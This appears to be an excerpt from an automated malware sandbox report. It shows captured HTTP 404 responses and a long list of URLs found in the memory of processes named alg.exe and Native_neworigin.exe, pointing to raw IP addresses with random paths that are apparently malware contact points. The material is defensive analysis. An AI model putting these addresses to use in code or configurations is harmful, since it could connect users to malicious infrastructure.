                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:30 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:59:34 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Nov 2024 08:59:34 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:59:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: alg.exe, 0000001D.00000003.2775833004.0000000000420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointDataInsiderSlabBehaviorReportedBuildInsiderSlabBehaviorS
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/)
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/ogua
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/oguax
                      Source: alg.exe, 0000001D.00000003.2066404539.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2029221480.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2128007595.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2005955873.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2013869387.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2454327094.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2142232405.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2184386077.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2076659041.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2054334789.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2097845797.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2168394435.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/slpstmitt
                      Source: alg.exe, 0000001D.00000003.1985241365.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1993777799.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/slpstmitttatqv
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/ogua
                      Source: alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                      Source: alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/5
                      Source: alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/P
                      Source: alg.exe, 0000001D.00000003.2476312068.00000000005B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/avkhmehufii
                      Source: alg.exe, 0000001D.00000003.2220274739.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2211141959.00000000005B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ggbuhmxfarcrplg)
                      Source: alg.exe, 0000001D.00000003.1518182798.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/njfejhipdedfbx#-8
                      Source: alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/t
                      Source: alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/wpvwjnrkggb
                      Source: alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/wpvwjnrkggb440
                      Source: alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/x
                      Source: alg.exe, 0000001D.00000003.2476312068.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/avkhmehufii
                      Source: alg.exe, 0000001D.00000003.2169448202.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/txxefbew
                      Source: alg.exe, 0000001D.00000003.2169448202.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/
                      Source: alg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/gs(
                      Source: alg.exe, 0000001D.00000003.2169448202.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/p
                      Source: alg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/tfidpljjhw
                      Source: alg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/tfidpljjhw440X
                      Source: alg.exe, 0000001D.00000003.2420123081.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2422232693.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/ubnpo
                      Source: alg.exe, 0000001D.00000003.2169448202.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/vwka
                      Source: alg.exe, 0000001D.00000003.2454327094.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/ubnpontbxw?
                      Source: alg.exe, 0000001D.00000003.2169448202.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/vwka
                      Source: alg.exe, 0000001D.00000003.2774103854.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2764898749.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/kafps
                      Source: alg.exe, 0000001D.00000003.2764898749.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2743764090.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/ijq
                      Source: alg.exe, 0000001D.00000003.2774103854.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2764898749.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2743764090.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185:80/luiqxxselqgi
                      Source: alg.exe, 0000001D.00000003.2636298943.00000000005A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/
                      Source: alg.exe, 0000001D.00000003.2169448202.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/srxp
                      Source: alg.exe, 0000001D.00000003.2476312068.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2453236791.00000000005A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/
                      Source: alg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/rfcbglebj
                      Source: alg.exe, 0000001D.00000003.2454327094.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/nb0
                      Source: alg.exe, 0000001D.00000003.2076659041.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/uahjpntri
                      Source: alg.exe, 0000001D.00000003.2554188081.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
                      Source: alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ahrycwbcmx
                      Source: alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ahrycwbcmxvps
                      Source: alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/d
                      Source: alg.exe, 0000001D.00000003.2054334789.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/phrsxg
                      Source: alg.exe, 0000001D.00000003.1976473773.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1958602560.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/qaejwi
                      Source: alg.exe, 0000001D.00000003.2774103854.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2801483530.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ahrycwbcmx
                      Source: alg.exe, 0000001D.00000003.2801483530.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ryyevidfy
                      Source: alg.exe, 0000001D.00000003.2601733139.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2585290760.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2454327094.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/efnfkaqjisfwrsut
                      Source: alg.exe, 0000001D.00000003.2142232405.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2184386077.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2168394435.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/cwpmdhyer
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gcjwtno
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gcjwtnop
                      Source: alg.exe, 0000001D.00000003.1544503132.0000000000583000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1530654690.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/itufvxod
